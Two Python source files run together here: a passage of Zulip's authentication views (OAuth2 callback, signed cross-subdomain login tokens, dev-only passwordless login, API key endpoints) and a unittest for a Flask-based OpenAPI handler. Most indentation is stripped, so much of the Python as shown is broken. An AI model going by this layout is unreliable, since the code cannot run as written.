try:
full_name = body['name']['formatted']
except KeyError:
# Only google+ users have a formatted name. I am ignoring i18n here.
full_name = '{} {}'.format(
body['name']['givenName'], body['name']['familyName']
)
for email in body['emails']:
if email['type'] == 'account':
break
else:
logging.error('Google oauth2 account email not found: %s' % (body,))
return HttpResponse(status=400)
email_address = email['value']
try:
realm = Realm.objects.get(string_id=subdomain)
except Realm.DoesNotExist: # nocoverage
return redirect_to_subdomain_login_url()
if mobile_flow_otp is not None:
        # The request was not initiated from the subdomain (mobile flow).
user_profile, return_data = authenticate_remote_user(realm, email_address)
invalid_subdomain = bool(return_data.get('invalid_subdomain'))
return login_or_register_remote_user(request, email_address, user_profile,
full_name, invalid_subdomain,
mobile_flow_otp=mobile_flow_otp,
is_signup=is_signup,
redirect_to=next)
return redirect_and_log_into_subdomain(
realm, full_name, email_address, is_signup=is_signup, redirect_to=next)
def authenticate_remote_user(realm: Realm, email_address: str) -> Tuple[UserProfile, Dict[str, Any]]:
return_data = {} # type: Dict[str, bool]
if email_address is None:
# No need to authenticate if email address is None. We already
# know that user_profile would be None as well. In fact, if we
# call authenticate in this case, we might get an exception from
# ZulipDummyBackend which doesn't accept a None as a username.
logging.warning("Email address was None while trying to authenticate "
"remote user.")
return None, return_data
user_profile = authenticate(username=email_address,
realm=realm,
use_dummy_backend=True,
return_data=return_data)
return user_profile, return_data
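
# Cross-subdomain login handoff: redirect_and_log_into_subdomain() signs the
# user's name, email and target subdomain into a short-lived token (max_age of
# 15 seconds on the signature), and log_into_subdomain() verifies that token on
# the target subdomain before completing the login.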
_subdomain_token_salt = 'zerver.views.auth.log_into_subdomain'
@log_view_func
def log_into_subdomain(request: HttpRequest, token: Text) -> HttpResponse:
try:
data = signing.loads(token, salt=_subdomain_token_salt, max_age=15)
except signing.SignatureExpired as e:
logging.warning('Subdomain cookie: {}'.format(e))
return HttpResponse(status=400)
except signing.BadSignature:
logging.warning('Subdomain cookie: Bad signature.')
return HttpResponse(status=400)
subdomain = get_subdomain(request)
if data['subdomain'] != subdomain:
logging.warning('Login attempt on invalid subdomain')
return HttpResponse(status=400)
email_address = data['email']
full_name = data['name']
is_signup = data['is_signup']
redirect_to = data['next']
if is_signup:
        # If we are signing up, user_profile should be None.  If the
        # email_address already exists, the user will get an error message.
user_profile = None
return_data = {} # type: Dict[str, Any]
else:
# We can be reasonably confident that this subdomain actually
# has a corresponding realm, since it was referenced in a
# signed cookie. But we probably should add some error
# handling for the case where the realm disappeared in the
# meantime.
realm = get_realm(subdomain)
user_profile, return_data = authenticate_remote_user(realm, email_address)
invalid_subdomain = bool(return_data.get('invalid_subdomain'))
return login_or_register_remote_user(request, email_address, user_profile,
full_name, invalid_subdomain=invalid_subdomain,
is_signup=is_signup, redirect_to=redirect_to)
def redirect_and_log_into_subdomain(realm: Realm, full_name: Text, email_address: Text,
is_signup: bool=False, redirect_to: Text='') -> HttpResponse:
data = {'name': full_name, 'email': email_address, 'subdomain': realm.subdomain,
'is_signup': is_signup, 'next': redirect_to}
token = signing.dumps(data, salt=_subdomain_token_salt)
subdomain_login_uri = (realm.uri
+ reverse('zerver.views.auth.log_into_subdomain', args=[token]))
return redirect(subdomain_login_uri)
def get_dev_users(realm: Optional[Realm]=None, extra_users_count: int=10) -> List[UserProfile]:
# Development environments usually have only a few users, but
# it still makes sense to limit how many extra users we render to
# support performance testing with DevAuthBackend.
if realm is not None:
users_query = UserProfile.objects.select_related().filter(is_bot=False, is_active=True, realm=realm)
else:
users_query = UserProfile.objects.select_related().filter(is_bot=False, is_active=True)
shakespearian_users = users_query.exclude(email__startswith='extrauser').order_by('email')
extra_users = users_query.filter(email__startswith='extrauser').order_by('email')
# Limit the number of extra users we offer by default
extra_users = extra_users[0:extra_users_count]
users = list(shakespearian_users) + list(extra_users)
return users
def redirect_to_misconfigured_ldap_notice(error_type: int) -> HttpResponse:
if error_type == ZulipLDAPAuthBackend.REALM_IS_NONE_ERROR:
url = reverse('ldap_error_realm_is_none')
else:
raise AssertionError("Invalid error type")
return HttpResponseRedirect(url)
def show_deactivation_notice(request: HttpRequest) -> HttpResponse:
realm = get_realm_from_request(request)
if realm and realm.deactivated:
return render(request, "zerver/deactivated.html",
context={"deactivated_domain_name": realm.name})
return HttpResponseRedirect(reverse('zerver.views.auth.login_page'))
def redirect_to_deactivation_notice() -> HttpResponse:
return HttpResponseRedirect(reverse('zerver.views.auth.show_deactivation_notice'))
def add_dev_login_context(realm: Realm, context: Dict[str, Any]) -> None:
users = get_dev_users(realm)
context['current_realm'] = realm
context['all_realms'] = Realm.objects.all()
context['direct_admins'] = [u for u in users if u.is_realm_admin]
context['direct_users'] = [u for u in users if not u.is_realm_admin]
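
# Renders the login form.  Already-authenticated users are redirected to their
# realm, deactivated realms get the deactivation notice, and in development
# the page also exposes the DevAuthBackend realm/user pickers.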
def login_page(request: HttpRequest, **kwargs: Any) -> HttpResponse:
if request.user.is_authenticated:
return HttpResponseRedirect(request.user.realm.uri)
if is_subdomain_root_or_alias(request) and settings.ROOT_DOMAIN_LANDING_PAGE:
redirect_url = reverse('zerver.views.registration.find_account')
return HttpResponseRedirect(redirect_url)
realm = get_realm_from_request(request)
if realm and realm.deactivated:
return redirect_to_deactivation_notice()
extra_context = kwargs.pop('extra_context', {})
if dev_auth_enabled():
if 'new_realm' in request.POST:
realm = get_realm(request.POST['new_realm'])
else:
realm = get_realm_from_request(request)
add_dev_login_context(realm, extra_context)
if realm and 'new_realm' in request.POST:
# If we're switching realms, redirect to that realm, but
# only if it actually exists.
return HttpResponseRedirect(realm.uri)
if 'username' in request.POST:
extra_context['email'] = request.POST['username']
try:
template_response = django_login_page(
request, authentication_form=OurAuthenticationForm,
extra_context=extra_context, **kwargs)
except ZulipLDAPConfigurationError as e:
assert len(e.args) > 1
return redirect_to_misconfigured_ldap_notice(e.args[1])
try:
template_response.context_data['email'] = request.GET['email']
except KeyError:
pass
try:
already_registered = request.GET['already_registered']
template_response.context_data['already_registered'] = already_registered
except KeyError:
pass
try:
template_response.context_data['subdomain'] = request.GET['subdomain']
template_response.context_data['wrong_subdomain_error'] = WRONG_SUBDOMAIN_ERROR
except KeyError:
pass
return template_response
@csrf_exempt
def dev_direct_login(request: HttpRequest, **kwargs: Any) -> HttpResponse:
    # This function allows logging in without a password and should only be
    # called in development environments; it requires DevAuthBackend to be
    # included in settings.AUTHENTICATION_BACKENDS.
if (not dev_auth_enabled()) or settings.PRODUCTION:
# This check is probably not required, since authenticate would fail without
# an enabled DevAuthBackend.
return HttpResponseRedirect(reverse('dev_not_supported'))
email = request.POST['direct_email']
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
user_profile = authenticate(dev_auth_username=email, realm=realm)
if user_profile is None:
return HttpResponseRedirect(reverse('dev_not_supported'))
do_login(request, user_profile)
next = request.GET.get('next', '')
redirect_to = get_safe_redirect_to(next, user_profile.realm.uri)
return HttpResponseRedirect(redirect_to)
@csrf_exempt
@require_post
@has_request_variables
def api_dev_fetch_api_key(request: HttpRequest, username: str=REQ()) -> HttpResponse:
"""This function allows logging in without a password on the Zulip
mobile apps when connecting to a Zulip development environment. It
requires DevAuthBackend to be included in settings.AUTHENTICATION_BACKENDS.
"""
if not dev_auth_enabled() or settings.PRODUCTION:
return json_error(_("Dev environment not enabled."))
    # Django invokes authenticate methods by matching arguments; since this
    # flow passes dev_auth_username rather than username/password, the LDAP
    # backend is never invoked, so there is no need to check whether it is
    # enabled.
validate_login_email(username)
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
return_data = {} # type: Dict[str, bool]
user_profile = authenticate(dev_auth_username=username,
realm=realm,
return_data=return_data)
if return_data.get("inactive_realm"):
return json_error(_("This organization has been deactivated."),
data={"reason": "realm deactivated"}, status=403)
if return_data.get("inactive_user"):
return json_error(_("Your account has been disabled."),
data={"reason": "user disable"}, status=403)
if user_profile is None:
return json_error(_("This user is not registered."),
data={"reason": "unregistered"}, status=403)
do_login(request, user_profile)
return json_success({"api_key": user_profile.api_key, "email": user_profile.email})
@csrf_exempt
def api_dev_get_emails(request: HttpRequest) -> HttpResponse:
if not dev_auth_enabled() or settings.PRODUCTION:
return json_error(_("Dev environment not enabled."))
users = get_dev_users()
return json_success(dict(direct_admins=[u.email for u in users if u.is_realm_admin],
direct_users=[u.email for u in users if not u.is_realm_admin]))
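
# API-key exchange endpoint used by API clients: trades a username/password
# (or, for the legacy Android app, a Google OAuth2 token) for the user's API
# key, returning a specific 403 reason when authentication fails.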
@csrf_exempt
@require_post
@has_request_variables
def api_fetch_api_key(request: HttpRequest, username: str=REQ(), password: str=REQ()) -> HttpResponse:
return_data = {} # type: Dict[str, bool]
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
if username == "google-oauth2-token":
# This code path is auth for the legacy Android app
user_profile = authenticate(google_oauth2_token=password,
realm=realm,
return_data=return_data)
else:
if not ldap_auth_enabled(realm=get_realm_from_request(request)):
            # If we are not authenticating against LDAP, require a valid email
            # address; the LDAP backend can authenticate with a non-email username.
validate_login_email(username)
user_profile = authenticate(username=username,
password=password,
realm=realm,
return_data=return_data)
if return_data.get("inactive_user"):
return json_error(_("Your account has been disabled."),
data={"reason": "user disable"}, status=403)
if return_data.get("inactive_realm"):
return json_error(_("This organization has been deactivated."),
data={"reason": "realm deactivated"}, status=403)
if return_data.get("password_auth_disabled"):
return json_error(_("Password auth is disabled in your team."),
data={"reason": "password auth disabled"}, status=403)
if user_profile is None:
if return_data.get("valid_attestation"):
# We can leak that the user is unregistered iff
# they present a valid authentication string for the user.
return json_error(_("This user is not registered; do so from a browser."),
data={"reason": "unregistered"}, status=403)
return json_error(_("Your username or password is incorrect."),
data={"reason": "incorrect_creds"}, status=403)
    # Maybe sending the 'user_logged_in' signal would be the better approach:
    # user_logged_in.send(sender=user_profile.__class__, request=request, user=user_profile)
    # We don't do that only because this code path does not store the user in
    # the session; a signal receiver that assumes it does would break.
email_on_new_login(sender=user_profile.__class__, request=request, user=user_profile)
# Mark this request as having a logged-in user for our server logs.
process_client(request, user_profile)
request._email = user_profile.email
return json_success({"api_key": user_profile.api_key, "email": user_profile.email})
def get_auth_backends_data(request: HttpRequest) -> Dict[str, Any]:
"""Returns which authentication methods are enabled on the server"""
subdomain = get_subdomain(request)
try:
realm = Realm.objects.get(string_id=subdomain)
except Realm.DoesNotExist:
# If not the root subdomain, this is an error
if subdomain != Realm.SUBDOMAIN_FOR_ROOT_DOMAIN:
raise JsonableError(_("Invalid subdomain"))
        # With the root subdomain, whether this is an error depends on
        # whether ROOT_DOMAIN_LANDING_PAGE (which indicates that there
        # are realms without subdomains on this server) is set.
if settings.ROOT_DOMAIN_LANDING_PAGE:
raise JsonableError(_("Subdomain required"))
else:
realm = None
return {
"password": password_auth_enabled(realm),
"dev": dev_auth_enabled(realm),
"email": email_auth_enabled(realm),
"github": github_auth_enabled(realm),
"google": google_auth_enabled(realm),
"remoteuser": remote_auth_enabled(realm),
"ldap": ldap_auth_enabled(realm),
}
@csrf_exempt
def api_get_auth_backends(request: HttpRequest) -> HttpResponse:
"""Deprecated route; this is to be replaced by api_get_server_settings"""
auth_backends = get_auth_backends_data(request)
auth_backends['zulip_version'] = ZULIP_VERSION
return json_success(auth_backends)
@require_GET
@csrf_exempt
def api_get_server_settings(request: HttpRequest) -> HttpResponse:
result = dict(
authentication_methods=get_auth_backends_data(request),
zulip_version=ZULIP_VERSION,
push_notifications_enabled=push_notifications_enabled(),
)
context = zulip_default_context(request)
# IMPORTANT NOTE:
# realm_name, realm_icon, etc. are not guaranteed to appear in the response.
    # * If they do, that means the server URL has only one realm on it.
    # * If they don't, the server has multiple realms, and it's not clear which
    #   one is being requested, so we can't send back this data.
for settings_item in [
"email_auth_enabled",
"require_email_format_usernames",
"realm_uri",
"realm_name",
"realm_icon",
"realm_description"]:
if context[settings_item] is not None:
result[settings_item] = context[settings_item]
return json_success(result)
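
# Fetches the API key for an already-logged-in user; when password auth is
# enabled for the realm, the supplied password is re-checked first.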
@has_request_variables
def json_fetch_api_key(request: HttpRequest, user_profile: UserProfile,
password: str=REQ(default='')) -> HttpResponse:
subdomain = get_subdomain(request)
realm = get_realm(subdomain)
if password_auth_enabled(user_profile.realm):
if not authenticate(username=user_profile.email, password=password,
realm=realm):
return json_error(_("Your username or password is incorrect."))
return json_success({"api_key": user_profile.api_key})
@csrf_exempt
def api_fetch_google_client_id(request: HttpRequest) -> HttpResponse:
if not settings.GOOGLE_CLIENT_ID:
return json_error(_("GOOGLE_CLIENT_ID is not configured"), status=400)
return json_success({"google_client_id": settings.GOOGLE_CLIENT_ID})
@require_post
def logout_then_login(request: HttpRequest, **kwargs: Any) -> HttpResponse:
return django_logout_then_login(request, kwargs)
def password_reset(request: HttpRequest, **kwargs: Any) -> HttpResponse:
realm = get_realm(get_subdomain(request))
if realm is None:
# If trying to get to password reset on a subdomain that
# doesn't exist, just go to find_account.
redirect_url = reverse('zerver.views.registration.find_account')
return HttpResponseRedirect(redirect_url)
return django_password_reset(request,
template_name='zerver/reset.html',
password_reset_form=ZulipPasswordResetForm,
post_reset_redirect='/accounts/password/reset/done/')
|
py | 1a348c21f1cec3c40c617158421da1ef6bbf7be5 | from restless.security import ApiKeyAuth
from restless.parameters import BodyParameter
from restless.interfaces.flask_app import FlaskHandler
from unittest import TestCase
import os
import json
import yaml
os.chdir(os.path.dirname(__file__))
class Message(BodyParameter):
text: str
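
# Exercises the FlaskHandler end to end: a trivial GET endpoint returning a
# Message body, plus the generated OpenAPI (swagger.json) document.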
class TestRouter(TestCase):
def setUp(self) -> None:
self.handler = FlaskHandler(
"Test API",
"meh",
"0.1",
security=[
ApiKeyAuth(ApiKeyAuth.In.header, name='Authorization')
]
)
self.client = self.handler.app.test_client()
def test_basic(self):
@self.handler.handle("get", "/")
def root() -> {200: Message}:
return Message(text="all cool")
out = self.client.get('/')
self.assertEqual(200, out.status_code, out.data)
self.assertEqual(
{'text': 'all cool'},
json.loads(out.data)
)
def test_spec(self):
@self.handler.handle("get", "/")
def root() -> {200: Message}:
return Message(text="all cool")
out = self.client.get('/spec/swagger.json')
self.assertEqual(200, out.status_code, out.data)
self.assertEqual(
{'components': {'schemas': {'Error': {'properties': {'details': {'type': 'object'},
'error': {'type': 'string'}},
'required': ['error']},
'Message': {'properties': {'text': {'title': 'Text',
'type': 'string'}},
'required': ['text'],
'title': 'Message',
'type': 'object'}},
'securitySchemes': {'Authorization': {'in': 'header',
'name': 'Authorization',
'type': 'apiKey'}}},
'info': {'description': 'meh', 'title': 'Test API', 'version': '0.1'},
'openapi': '3.0.0',
'paths': {'/': {'get': {'description': 'root',
'parameters': [],
'responses': {'200': {'content': {
'application/json': {'schema': {'$ref': '#/components/schemas/Message'}}},
'description': 'meh'},
'400': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Bad Request'},
'401': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Unauthorized'},
'403': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Forbidden'},
'404': {'content': {'application/json': {
'schema': {'$ref': '#/components/schemas/Error'}}},
'description': 'Not Found'}},
'tags': ['']}},
'/spec/swagger.{extension}': {'get': {'description': 'spec',
'parameters': [{'description': 'extension',
'in': 'path',
'name': 'extension',
'required': True,
'schema': {'enum': ['yaml',
'json'],
'type': 'string'}}],
'responses': {'200': {'content': {
'application/json': {'schema': {'type': 'string'}}},
'description': 'meh'},
'400': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Bad '
'Request'},
'401': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Unauthorized'},
'403': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Forbidden'},
'404': {'content': {'application/json': {
'schema': {
'$ref': '#/components/schemas/Error'}}},
'description': 'Not '
'Found'}},
'tags': ['spec']}}},
'servers': [],
'tags': []}
,
yaml.load(out.data, Loader=yaml.SafeLoader)
)
|